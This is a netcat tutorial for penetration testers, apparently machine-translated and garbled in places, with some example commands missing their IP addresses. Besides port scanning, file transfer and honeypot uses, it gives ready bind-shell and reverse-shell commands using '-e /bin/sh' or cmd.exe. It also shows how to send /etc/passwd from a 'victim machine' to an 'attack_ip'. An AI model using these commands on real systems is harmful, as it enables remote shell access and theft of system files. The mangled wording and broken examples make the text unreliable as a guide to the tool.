netcat | The TCP/IP swiss army

Engaged in the penetration test for several years, and in the process of doing the project found that good penetration technology is important, but want to test out more results, can not be separated from a powerful tool. Even the ability of super cattle, I think it is impossible to completely do infiltration, after all, penetration test or a manual labor.
Some people now think that penetration testing is getting simpler, because open source automation tools a big push, the wheels are also upgrading. Even if the security ignorant, as long as the tool a run can get a lot of loopholes, and even automated access permissions. I have to admit that the current automated infiltration tool has reduced the entry threshold for this industry, but that does not mean that penetration testing is becoming easier.
First of all, my reason is that security is always a long time, technology has never stalled, security technology is always ahead of the security tools, so only use the tools, and sometimes make the penetration test work is difficult to carry out, because the means of protection increasingly updated , While the attack technology can only rely on lagging behind the tools, so the test results can be seen. Followed by the current market, a powerful penetration of the tools, need to use a certain basis, not fool-style operation, want to use a good artifact, it is not easy. To sum up, I personally think that the current penetration of the test work will be more difficult, and with the national enterprises on the safety of attention, penetration test practitioners shoulders the burden will only be heavier.
The opening of the half-day egg is nothing more than to lead the theme of this series – infiltration artifact, the reason you want to introduce the record used in the penetration test artifact, because the work is good , must first of its profits, nothing more!
This article as the first of this series, will introduce an infiltration of the enduring artifact, the reputation of the Swiss military knife nc. Most of the contents of this article from the Internet, such as the old content can be self-bypass, I try to record all aspects of nc use, all when the personal inquiries, can be sprayed.

Introduce to Netcat

nc full name netcat, is a network tool in the Swiss Army knife, it can through TCP and UDP in the network to read and write data, powerful.

Netcat Installation

Linux/Mac acquiescence installed nc, you can enter the command line nc -h view.
Windows can be downloaded under the nc.exe tool.

Netcat Usage

Basic usage

Can enter nc -h to view help:

-h to view the help information
-d background mode
-g gateway source-routing hop point [s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-e prog program redirect, The use of [dangerous]
-i secs delay interval-
l monitoring mode for inbound
connection-L monitor mode, the connection is still closed after the closure until the CTR + C-
n IP address, can not use the domain name (do not use DNS Reverse the IP address of the domain name)
-o film record hexadecimal transmission-
p [space] port local port number
-s addr local source address-
r random local and remote port-
t use Telnet interactive mode-
u UDP mode
– V detailed output, with -vv will be more detailed
-w digital timeout delay interval
-z will be input, output off (for swiping anchor)

PortScan (port scan)

Basic tcp scan:

nc -vv ip port
Example: nc -vv 5000



Set the delay, specify the port scan:

nc -vv -w secs ip port-port
Example:nc -vv -w 5 5000-5002



Establish connection

Forward connection

Target to listen to a port:

nc -l -p port -e cmd.exe //windows
nc -l -p port -e /bin/sh //linux



The machine is connected to this port:

nc ip port



Reverse link

The local monitor a port:

nc -vv -l -p port



Target connection to this port:

nc -e cmd.exe ip port // windows
nc -e / bin / sh ip port // linux



Deliver files

Download the file on the target machine

victim machine:
nc attack_ip port <  /etc/passwd
attacker machine:
nc -d -l -p  port  >  tmp



The machine as a target machine, because it is the network ip, simulation of the situation, for the attack machine, now is to download the file from the target machine to the attack machine.
Target machine: nc.exe 9999 <H: \ test.txt will be under the target machine H drive under the test.txt file to attack aircraft 9999 port
attack machine: nc.exe-d -l-p 9999> test. Txt will be the machine 9999 port transmission over the file renamed test.txt

Upload file to target machine

attacker machine:
nc -d -l -p port < tmp
victim machine:
nc attack_ip port > tmp



Attacker: nc -d -l -p 9990 <test2.txt
Target machine: nc 9990> test2.txt

Port data capture packets

nc -vv -w 2 -o test.txt 80 21-15



With the command, you can zoom in on the function of nc.

Encrypted transmission of data

Server: $nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt
Client: $mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567

Directory transfer

Target machine: $tar -cvf – dir_name | nc -l 1567
Attacker: $nc -n 1567 | tar -xvf –

Command record

nc -vv victim_ip port < path\file.cmd



Build honeypots

  • nc -L -p 80 as a honeypot 1: open and keep listening to port 80 until CTR + C
  • nc -L -p 80 > c:\log.txt as a honeypot with 2: open and keep listening to port 80, until the CTR + C, while the results are output to c: \ log.txt
  • nc -L -p 80 < c:\honeyport.txt as a honeypot with 3-1: open and keep listening to port 80 until tick + C, and c: \ honeyport.txt content into the pipeline, Can also play a role in the transmission of documents
  • type.exe c:\honeyport | nc -L -p 80 as a honeypot with 3-2: open and keep listening to port 80, until CTR + C, and c: \ honeyport.txt content into the pipeline , Can also play a role in the transmission of documents